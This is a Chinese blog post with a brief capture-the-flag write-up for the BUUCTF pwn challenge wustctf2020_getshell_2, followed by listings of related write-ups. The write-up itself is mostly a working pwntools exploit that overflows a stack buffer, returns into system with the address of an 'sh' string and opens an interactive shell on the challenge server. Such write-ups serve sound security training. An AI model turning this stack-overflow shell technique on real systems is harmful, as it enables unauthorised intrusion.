[BUUCTF-pwn]——wustctf2020_getshell_2

最新推荐文章于 2024-02-07 03:42:45 发布

Y-peak

最新推荐文章于 2024-02-07 03:42:45 发布

阅读量510

点赞数

分类专栏： # BUUCTF

本文链接：https://blog.youkuaiyun.com/Y_peak/article/details/115005545

版权

BUUCTF 专栏收录该内容

89 篇文章

订阅专栏

[BUUCTF-pwn]——wustctf2020_getshell_2

有system没有sh。所以找一下
在这里插入图片描述

exploit

from pwn import *
p = remote('node3.buuoj.cn',25464)
sh = 0x08048670
payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) 
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

buuctf wustctf2020_getshell_2 ret2shellcode

weixin_45441024的博客

12-01

735

BUUCTF wustctf2020_getshell_2 check一下，32位的程序且没有开任何保护用ida打开，vuln很明显这是一个漏洞函数，f5查看一下伪代码，可以看到buf距离栈底0x18个字节这是shell函数的伪代码，我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用，那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe

[BUUCTF]-PWN:wustctf2020_easyfast解析(fastbin double free)

2301_79326813的博客

02-06

413

又是堆题，查看保护再看ida大致就是alloc创建堆块，free释放堆块，fill填充堆块，以及一个getshell的函数，但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用double free有两种解法。

参与评论您还未登录，请先登录后发表或查看评论

[buuctf]wustctf2020_getshell_2

逆向萌新的博客

07-03

430

[buuctf]wustctf2020_getshell_2

wustctf2020_getshell_2

m0sway的博客

12-13

2451

wustctf2020_getshell_2 使用checksec查看：只开启了栈不可执行，应该和1一样是道栈溢出题目。放进IDA中查看：和1一样主函数中给出漏洞函数，漏洞函数中直接一个栈溢出。但是后门函数并没有直接给出system(/bin/sh)，而是给了system("/bbbbbbbbin_what_the_f?ck__--??/sh") 这样就不能直接调用后门函数进行getshell。虽然没有给/bin/sh，但是这串字符串的最后sh可以用作参数，同样可以获取到shell。记录下地

BUUCTF pwn——wustctf2020_getshell_2

CNS-Enterprise BCC-1701-J

05-23

220

BUUCTF 做题练习

wustctf2020_getshell

m0sway的博客

11-28

836

wustctf2020_getshell 使用checksec查看：只开启了一个栈不可执行，没开Canary，考虑栈溢出题目。拉进IDA中查看：主函数中直接给漏洞函数，跟进： read()函数，能读取0x20的数据，buf距离ebp0x18，因为这是个32位的程序，ebp+4后还能放下一个one_gadget 首先考虑下这个程序本身有没有get_shell的函数，通过搜索字符串可以发现函数shell()： ok了，这题直接秒了。 exp： from pwn import * #start

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

1097

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

BUUCTF-Pwn-get_started_3dsctf_2016

餐桌上的猫

03-04

248

题目截图

[BUUCTF]PWN——wustctf2020_getshell1/2

mcmuyanga的博客

11-11

1552

wustctf2020_getshell 附件步骤：例行检查，32位程序，开启了NX保护本地试运行一下程序，看看大概的情况 32位ida载入，习惯性的检索程序里的字符串，发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞，正好溢出8位，让我们覆盖到ret exp： from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B

pwn旅行之[WUSTCTF 2020]getshell2（一些小知识）

qq_66013948的博客

02-07

661

Linux下查找文件（find、grep命令）_linux查找文件-优快云博客find 路径 -name "文件名"之后就是根据题目猜测flag文件的名字，最后通过上一条语句进行查找，当然，如果猜不到，那么还是只有挨个找了。

buuctf-pwn write-ups (1)

CoLin的pwn小屋

05-01

480

buuctf-pwn 001-016题wp

buuctf-pwn write-ups (4)

CoLin的pwn小屋

06-12

556

buuctf 032-038题题解，重点关注038题 pwnable_orw

buuctf-pwn write-ups (2)

CoLin的pwn小屋

05-07

316

buuctf-pwn 017-026题wp，重点关注babyheap

[buuctf]wustctf2020_getshell

逆向萌新的博客

07-02

748

[buuctf]wustctf2020_getshell

BUUCTF-PWN-Writeup-1-5

feng的博客

01-20

3299

前言开始刷一刷Buuctf的PWN题，一遍学一遍刷题了。其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点，太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。一个gets的栈溢出，后门函数fun()在0x401186，本

buuctf-pwn write-ups (3)

CoLin的pwn小屋

05-15

303

buuctf pwn 027-031题

buuctf-pwn入门